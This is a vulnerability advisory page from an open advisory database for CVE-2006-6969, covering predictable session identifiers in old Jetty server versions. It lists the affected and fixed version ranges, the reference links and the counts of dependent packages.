Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: GSA_kwCzR0hTQS1qZzJ4LXI2NDMtdzJjaM2Uig
Jetty Uses Predictable Session Identifiers
Jetty before 4.2.27, 5.1 before 5.1.12, 6.0 before 6.0.2, and 6.1 before 6.1.0pre3 generates predictable session identifiers using java.util.random, which makes it easier for remote attackers to guess a session identifier through brute force attacks, bypass authentication requirements, and possibly conduct cross-site request forgery attacks.
Permalink: https://github.com/advisories/GHSA-jg2x-r643-w2chJSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1qZzJ4LXI2NDMtdzJjaM2Uig
Source: GitHub Advisory Database
Origin: Unspecified
Severity: Moderate
Classification: General
Published: about 2 years ago
Updated: 3 months ago
Identifiers: GHSA-jg2x-r643-w2ch, CVE-2006-6969
References:
- https://nvd.nist.gov/vuln/detail/CVE-2006-6969
- https://exchange.xforce.ibmcloud.com/vulnerabilities/32240
- https://github.com/jetty-project/codehaus-jetty6/commit/36f81d2e7058b012f6718bc2f1e2786694a8a4a1
- https://github.com/jetty-project/codehaus-jetty6/commit/b31f606bf8058a38ab6253aa8dc2dfe6a7f83c78
- https://web.archive.org/web/20070208112816/http://fisheye.codehaus.org/changelog/jetty/?cs=1274
- https://web.archive.org/web/20070602184857/http://archives.neohapsis.com/archives/bugtraq/2007-02/0070.html
- https://web.archive.org/web/20121019131825/http://www.securityfocus.com/archive/1/459164/100/0/threaded
- https://web.archive.org/web/20200228100052/http://www.securityfocus.com/bid/22405
- https://github.com/advisories/GHSA-jg2x-r643-w2ch
Blast Radius: 0.0
Affected Packages
maven:org.eclipse.jetty:jetty-server
Dependent packages: 3,819Dependent repositories: 34,580
Downloads:
Affected Version Ranges: >= 6.1.0pre1, < 6.1.0pre3, >= 6.0.0, < 6.0.2, >= 5.1.0, < 5.1.12, < 4.2.27
Fixed in: 6.1.0pre3, 6.0.2, 5.1.12, 4.2.27
All affected versions:
All unaffected versions: 10.0.0, 10.0.1, 10.0.2, 10.0.3, 10.0.4, 10.0.5, 10.0.6, 10.0.7, 10.0.8, 10.0.9, 10.0.10, 10.0.11, 10.0.12, 10.0.13, 10.0.14, 10.0.15, 10.0.16, 10.0.17, 10.0.18, 10.0.19, 10.0.20, 11.0.0, 11.0.1, 11.0.2, 11.0.3, 11.0.4, 11.0.5, 11.0.6, 11.0.7, 11.0.8, 11.0.9, 11.0.10, 11.0.11, 11.0.12, 11.0.13, 11.0.14, 11.0.15, 11.0.16, 11.0.17, 11.0.18, 11.0.19, 11.0.20, 12.0.0, 12.0.1, 12.0.2, 12.0.3, 12.0.4, 12.0.5, 12.0.6, 12.0.7, 12.0.8